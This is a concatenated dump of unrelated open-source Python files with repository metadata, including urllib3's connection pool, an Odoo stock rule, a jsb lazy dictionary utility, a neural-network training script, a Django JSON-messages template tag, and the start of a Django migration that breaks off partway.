# Can we find translation in 'CFG_SITE_LANG'?
if re.search(pattern_CFG_SITE_LANG, lang_tag_content) is None:
current_lang = 'en'
cleaned_lang_tag = ln_pattern.sub(clean_language_tag, lang_tag_content)
# Remove empty lines
# Only if 'keep' has not been set
if keep == False:
stripped_text = ''
for line in cleaned_lang_tag.splitlines(True):
if line.strip():
stripped_text += line
cleaned_lang_tag = stripped_text
return cleaned_lang_tag
# End of search_lang_tag(..)
filtered_text = pattern_lang.sub(search_lang_tag, text)
return filtered_text
def usage(exitcode=1, msg=""):
"""Prints usage info."""
if msg:
sys.stderr.write("Error: %s.\n" % msg)
sys.stderr.write("Usage: %s [options] <webdocname>\n" % sys.argv[0])
sys.stderr.write(" -h, --help \t\t Print this help.\n")
sys.stderr.write(" -V, --version \t\t Print version information.\n")
sys.stderr.write(" -v, --verbose=LEVEL \t\t Verbose level (0=min,1=normal,9=max).\n")
sys.stderr.write(" -l, --language=LN1,LN2,.. \t\t Language(s) to process (default all)\n")
sys.stderr.write(" -m, --mode=MODE \t\t Update cache mode(0=Never,1=if necessary,2=always) (default 2)\n")
sys.stderr.write("\n")
sys.stderr.write(" Example: webdoc search-guide\n")
sys.stderr.write(" Example: webdoc -l en,fr search-guide\n")
sys.stderr.write(" Example: webdoc -m 1 search-guide")
sys.stderr.write("\n")
sys.exit(exitcode)
def main():
"""
main entry point for webdoc via command line
"""
options = {'language':CFG_SITE_LANGS, 'verbose':1, 'mode':2}
try:
opts, args = getopt.getopt(sys.argv[1:],
"hVv:l:m:",
["help",
"version",
"verbose=",
"language=",
"mode="])
except getopt.GetoptError, err:
usage(1, err)
try:
for opt in opts:
if opt[0] in ["-h", "--help"]:
usage(0)
elif opt[0] in ["-V", "--version"]:
print __revision__
sys.exit(0)
elif opt[0] in ["-v", "--verbose"]:
options["verbose"] = int(opt[1])
elif opt[0] in ["-l", "--language"]:
options["language"] = [wash_language(lang.strip().lower()) \
for lang in opt[1].split(',') \
if lang in CFG_SITE_LANGS]
elif opt[0] in ["-m", "--mode"]:
options["mode"] = opt[1]
except StandardError, e:
usage(e)
try:
options["mode"] = int(options["mode"])
except ValueError:
usage(1, "Mode must be an integer")
if len(args) > 0:
options["webdoc"] = args[0]
if not options.has_key("webdoc"):
usage(0)
# check if webdoc exists
infos = get_webdoc_info(options["webdoc"])
if infos[0] is None:
usage(1, "Could not find %s" % options["webdoc"])
update_webdoc_cache(webdoc=options["webdoc"],
mode=options["mode"],
verbose=options["verbose"],
languages=options["language"])
if __name__ == "__main__":
main()
| valkyriesavage/invenio | modules/webstyle/lib/webdoc.py | Python | gpl-2.0 | 36,494 |
# Copyright 2018-20 ForgeFlow S.L. (https://www.forgeflow.com)
# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl.html).
from odoo import models
class StockRule(models.Model):
_inherit = "stock.rule"
def _update_purchase_order_line(
self, product_id, product_qty, product_uom, company_id, values, line
):
vals = super()._update_purchase_order_line(
product_id, product_qty, product_uom, company_id, values, line
)
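        # Link the originating orderpoint(s) to the purchase order line; in the
        # Odoo ORM, (4, id) is the x2many "link" command for an existing record.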
if "orderpoint_id" in values and values["orderpoint_id"].id:
vals["orderpoint_ids"] = [(4, values["orderpoint_id"].id)]
# If the procurement was run by a stock move.
elif "orderpoint_ids" in values:
vals["orderpoint_ids"] = [(4, o.id) for o in values["orderpoint_ids"]]
return vals
| OCA/stock-logistics-warehouse | stock_orderpoint_purchase_link/models/stock_rule.py | Python | agpl-3.0 | 816 |
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
import Queue as _ # Platform-specific: Windows
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError, ConnectionError
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
# httplib doesn't like it when we include brackets in ipv6 addresses
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
    def close(self):
"""
Close all pooled connections and disable the pool.
"""
pass
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`"
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`"
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
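    Example (host and parameters are illustrative)::
        >>> pool = HTTPConnectionPool('example.com', maxsize=10, retries=Retry(3))
        >>> r = pool.request('GET', '/')  # request() is inherited from RequestMethods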
"""
scheme = 'http'
ConnectionCls = HTTPConnection
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s" %
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older
httplib_response = conn.getresponse()
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s" % (method, url, http_version,
httplib_response.status,
httplib_response.length))
return httplib_response
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
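        Example (values are illustrative, not defaults)::
            >>> pool.urlopen('GET', '/', retries=Retry(3, redirect=2),
            ...              timeout=Timeout(connect=2.0, read=7.0))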
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
if conn:
conn.close()
conn = None
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
if conn:
conn.close()
conn = None
raise
except (TimeoutError, HTTPException, SocketError, ConnectionError) as e:
if conn:
# Discard the connection for these exceptions. It will be
# be replaced during the next _get_conn() call.
conn.close()
conn = None
if isinstance(e, SocketError) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if release_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s" % (retries, err, url))
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
log.info("Redirecting %s -> %s" % (url, redirect_location))
return self.urlopen(method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
retries = retries.increment(method, url, response=response, _pool=self)
retries.sleep()
log.info("Forced retry: %s" % url)
return self.urlopen(method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs`` and
``ssl_version`` are only used if :mod:`ssl` is available and are fed into
:meth:`urllib3.util.ssl_wrap_socket` to upgrade the connection socket
into an SSL socket.
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
**conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.org/en/latest/security.html'),
InsecureRequestWarning)
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
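# --- Editor's note: illustrative usage sketch, not part of the original
# module; the host name and CA bundle path below are hypothetical. ---
if __name__ == '__main__':
    # A verified HTTPS pool: cert_reqs/ca_certs are forwarded to
    # ssl_wrap_socket via _prepare_conn() on each new connection.
    https_pool = HTTPSConnectionPool('example.org', port=443,
                                     cert_reqs='CERT_REQUIRED',
                                     ca_certs='/path/to/ca-bundle.crt',
                                     maxsize=2)
    # connection_from_url() picks the pool class from the URL scheme.
    pool = connection_from_url('http://example.org/', maxsize=2)
    response = pool.request('GET', '/')
    print(response.status)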
| bendikro/deluge-yarss-plugin | yarss2/lib/requests/packages/urllib3/connectionpool.py | Python | gpl-3.0 | 30,319 |
import pytest
class TestNcftp:
@pytest.mark.complete("ncftp ")
def test_1(self, completion):
assert completion
@pytest.mark.complete("ncftp -", require_cmd=True)
def test_2(self, completion):
assert completion
| algorythmic/bash-completion | test/t/test_ncftp.py | Python | gpl-2.0 | 245 |
import matplotlib.pylab as plt
plt.ion()
import cPickle as pickle
import numpy as np
from scipy.io import loadmat
from sklearn.cross_validation import train_test_split
from activation_funcs import sigmoid_function, tanh_function
from neural_net import NeuralNet
# load standardized data and labels from disk
train_features = np.load('train_features.np')
train_labels = np.load('train_labels.pkl')
# split to obtain train and test set
x_train, x_test, y_train, y_test = train_test_split(train_features,
train_labels,
test_size=0.33)
# network topology
n_inputs = train_features.shape[1]
n_outputs = 10
n_hiddens_nodes = 200
n_hidden_layers = 1
# specify activation functions per layer
activation_functions = [tanh_function] * n_hidden_layers + [sigmoid_function]
# initialize the neural network
network = NeuralNet(n_inputs, n_outputs, n_hiddens_nodes, n_hidden_layers,
activation_functions)
# start training on test set one
learning_rate = 0.001
plot_step = 5000
pred_epochs = np.arange(0, x_train.shape[0], plot_step)
errors = network.train(x_train, y_train, learning_rate, pred_epochs=pred_epochs)
plt.plot(errors)
plt.savefig('nn_errors.png')
# save the trained network
#network.save_pkl_to_file( "trained_configuration.pkl" )
# load a stored network configuration
# network = NeuralNet.load_pkl_from_file( "trained_configuration.pkl" )
| jvpoulos/cs289-hw6 | code/test_neural_network.py | Python | mit | 1,471 |
# jsb/utils/lazydict.py
#
# thnx to maze
""" a lazydict allows dotted access to a dict .. dict.key. """
## jsb imports
from jsb.utils.locking import lockdec
from jsb.utils.exception import handle_exception
from jsb.lib.errors import PropertyIgnored
from jsb.imports import getjson
json = getjson()
## basic imports
from xml.sax.saxutils import unescape
import copy
import logging
import uuid
import types
import threading
import os
import re
## locks
lock = threading.RLock()
locked = lockdec(lock)
## defines
jsontypes = [types.StringType, types.UnicodeType, types.DictType, types.ListType, types.IntType]
defaultignore = ['finished', 'inqueue', 'resqueue', 'outqueue', 'waitlist', 'comments', 'createdfrom', 'modname', 'cfile', 'dir', 'filename', 'webchannels', 'tokens', 'token', 'cmndperms', 'gatekeeper', 'stanza', 'isremote', 'iscmnd', 'orig', 'bot', 'origtxt', 'body', 'subelements', 'args', 'rest', 'cfg', 'pass', 'password', 'fsock', 'sock', 'handlers', 'users', 'plugins']
cpy = copy.deepcopy
## checkignore function
def checkignore(name, ignore):
""" see whether a element attribute (name) should be ignored. """
name = unicode(name)
if name.startswith('_'): return True
for item in ignore:
if item == name:
#logging.debug("lazydict - ignoring on %s" % name)
return True
return False
#@locked
def dumpelement(element, prev={}, withtypes=False):
""" check each attribute of element whether it is dumpable. """
elem = cpy(element)
if not elem: elem = element
try: new = dict(prev)
except (TypeError, ValueError): new = {}
for name in elem:
#logging.debug("lazydict - trying dump of %s" % name)
if checkignore(name, defaultignore): continue
if not elem[name]: continue
try:
json.dumps(elem[name])
new[name] = elem[name]
except TypeError:
if type(elem) not in jsontypes:
if withtypes: new[name] = unicode(type(elem))
else:
logging.warn("lazydict - dumpelement - %s" % elem[name])
new[name] = dumpelement(elem[name], new)
return new
## LazyDict class
class LazyDict(dict):
""" lazy dict allows dotted access to a dict """
    def __deepcopy__(self, memo):
        """ deep-copy the contents into a new LazyDict. """
        return LazyDict(copy.deepcopy(dict(self), memo))
def __getattr__(self, attr, default=None):
""" get attribute. """
if not self.has_key(attr): self[attr] = default
return self[attr]
def __setattr__(self, attr, value):
""" set attribute. """
self[attr] = value
def render(self, template):
temp = open(template, 'r').read()
for key, value in self.iteritems():
try: temp = temp.replace("{{ %s }}" % key, value)
except: pass
return temp
def dostring(self):
""" return a string representation of the dict """
res = ""
cp = dict(self)
for item, value in cp.iteritems(): res += "%r=%r " % (item, value)
return res
def tojson(self, withtypes=False):
""" dump the lazydict object to json. """
try: return json.dumps(dumpelement(self, withtypes))
except RuntimeError, ex: handle_exception()
def dump(self, withtypes=False):
""" just dunp the lazydict object. DON'T convert to json. """
#logging.warn("lazydict - dumping - %s" % type(self))
try: return dumpelement(cpy(self), withtypes)
except RuntimeError, ex: handle_exception()
def load(self, input):
""" load from json string. """
try: temp = json.loads(input)
except ValueError:
handle_exception()
logging.error("lazydict - can't decode %s" % input)
return self
if type(temp) != dict:
logging.error("lazydict - %s is not a dict" % str(temp))
return self
self.update(temp)
return self
def tofile(self, filename):
f = open(filename + ".tmp", 'w')
f.write(self.tojson())
f.close()
os.rename(filename + '.tmp', filename)
def fromfile(self, filename):
f = open(filename, "r")
self.update(json.loads(f.read()))
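## editor's note: illustrative sketch, not part of the original module.
## shows the dotted access and the JSON round-trip; key names are made up.
if __name__ == '__main__':
    d = LazyDict()
    d.channel = "#demo"            # same as d['channel'] = "#demo"
    print d.channel, d.missing     # missing keys come back as None
    dumped = d.tojson()            # keys listed in defaultignore are skipped
    print LazyDict().load(dumped).channel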
| melmothx/jsonbot | jsb/utils/lazydict.py | Python | mit | 4,224 |
from django import template
import json
import django.utils.html
import django.utils.safestring
register = template.Library()
@register.simple_tag(takes_context=True)
def json_messages(context):
for m in context.get('json_messages',[]):
m['msg'] = django.utils.html.escapejs(m['msg'])
json_dump = json.dumps(context.get('json_messages'))
return json_dump
@register.simple_tag(takes_context=True)
def json_messages_script(context, on_window=True, js_variable='messages'):
script = '<script type="text/javascript">{variable_definition} = {dump};</script>'
if on_window:
variable_definition = 'window.{}'
else:
variable_definition = 'var {}'
variable_definition = variable_definition.format(js_variable)
return script.format(variable_definition=variable_definition, dump=json_messages(context))
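# Editor's note: illustrative usage sketch, not part of the original file.
# Assuming a view put a 'json_messages' list of {'msg': ...} dicts into the
# template context, a template could emit them with:
#
#   {% load json_messages %}
#   {% json_messages_script %}
#
# which renders roughly: <script ...>window.messages = [...];</script>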
| matiboy/django-json-messages | json_messages/templatetags/json_messages.py | Python | gpl-2.0 | 811 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-11-23 18:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ctdata', '0038_auto_20161123_1227'),
]
operations = [
migrations.AddField(
model_name='dataacademyabstractevent',
name='eventbrite_event_id',
field=models.CharField(default='', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='dataacademyabstractevent',
name='publish_eventbrite',
field=models.BooleanField(default=False),
